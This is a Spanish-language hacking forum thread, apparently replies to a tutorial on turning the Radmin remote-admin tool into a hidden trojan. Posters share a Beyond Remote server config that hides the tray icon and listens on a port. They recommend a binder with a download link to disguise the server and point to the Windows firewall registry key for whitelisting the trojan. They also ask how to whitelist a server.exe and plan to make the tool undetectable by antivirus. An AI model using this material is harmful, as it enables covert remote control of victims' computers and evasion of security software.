actualizacion de troyanizando radmin

SeniorX · 24 Septiembre 2005, 02:44 AM

entonces está mas que claro que te debes cambiar de antivirus, o quizas actualizarlo.

octalh · 24 Septiembre 2005, 02:51 AM

ok lo tomare en cuenta aunque en si el post no trata sobre antivirus eso esta fuera de contexto , si quieres puedes hacer lo mismo con VNC o cualquier otro... mas que una guia paso a paso es un texto para ampliar conocimientos y usar tu imaginacion...

SeniorX · 24 Septiembre 2005, 04:13 AM

de todas maneras el texto está bueno en ese contexto y felicitaciones men y gracias por el trabajo que te diste.

_R€d_ · 24 Septiembre 2005, 06:38 AM

SeniorX que mal agradecido eres xDDDDD

Pues hablando de antivirus; los detectan solo los mejores; para mi el mejor: Nod32...0:)

ibiza-tdi · 7 Noviembre 2005, 21:02 PM

K onda;
Soy novato en esto...je...Y tengo un problema con el tuto...de donde obtengo el archivo "AdmDll.dll" ??...No lo encuentro por ninguna parte...Espero k me puedan ayudar...

Saludos
Ibiza-Tdi... 8)

ibiza-tdi · 8 Noviembre 2005, 00:28 AM

K onda
Ya vi cual era el problema es k el k habia instalado era el Radmin 2.2 y no el 2.1 ... solo falta probar los archivos a ver k tal...

Saludos
Ibiza-Tdi... 8)

uniqdom · 12 Noviembre 2005, 13:59 PM

hace un tiempo atras hice un ejecutable en c++ que hacia toda la configuracion de radmin 2.1. Este creaba las llaves en el registro (password, icono escondido,, etc), y copiaba el radmin y su dll a la carpeta /windows/.

si alguien quiere el codigo me avisa.
vale decir que radmin ya es detectado!!
ahora estoy usando un programa (administrador de redes tambien) que se llama Beyond Remote (version 1.2.1.531) (permite controlar el computador remoto, ver la pantalla remota, transferencia de archivos, chat, reiniciar y apagar el pc remoto. lo unico que le falta es Shell remota). bueno... este programita se basa en la configuracion de un archivo (BRServer.cfg) por lo que no necesitan modificar casi nada en el registro (solo hacer que se inicie al encender el pc).
aqui el archivo de configuracion.

Código [Seleccionar]

[CONFIG]
Password=±²³´µ¶·¸¹
EnableLogFile=0
LogFile=C:\ARCHIVOS DE PROGRAMA\DATAAPPLES\BEYONDREMOTE\BRSERVER.log
ListenPort=5424
RC=
PasswordProtectTrayIcon=1
HideTrayIcon=1
IPFiltering=0
EnableTransparencyDetection=0

lo unico que deben hacer es usar un binder. les recomiendo IPACKER TOOL (Muy buen programa, aunque descontinuado. usa una dll que es detectada por los antivirus.)
puedes descargarlo de aqui:
http://ns2.elhacker.net/DECRIPT/BINDER/Ipacker_tool.rar

anajnu · 6 Febrero 2006, 19:50 PM

exelente !!! y funciona pero me gustaria saber por favor si quiero añadir un ejecutable cualquiera a la lista de los permitidos por el firewall como creo el bat para eso por ejemplo un server.exe

octalh · 9 Febrero 2006, 19:57 PM

Citarsi se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida

esto solo es pa el fw del sp2

salu2

intruder_inside · 12 Febrero 2006, 05:32 AM

Pero no hey forma de modificar el nombre del dll y con ingenieria inversa hacer referencia dentro del r_admin al nuevo nombre de la dll, por que es que el antivirus lo reconoce es por el nombre y no por la esencia, osea no por lo que dentro de la libreria dinamica hay, creo que todos estamos a esperas de que sea indetectable por los antivirus asi que o a trabajar todos juntos para hacerlo o esperar 10 años mas a que alguien lo haga.

Propongo que hagamos una entrada principal que se llame ocultando el r_admin de los antivirus y posteemos todos nuestro conocimientos, pruebas e investigaciones para asi hacerlos nosotros en grupo y llevarnos los creditos de por vida, por que hasta donde se muchos quieren usarlo incluso yo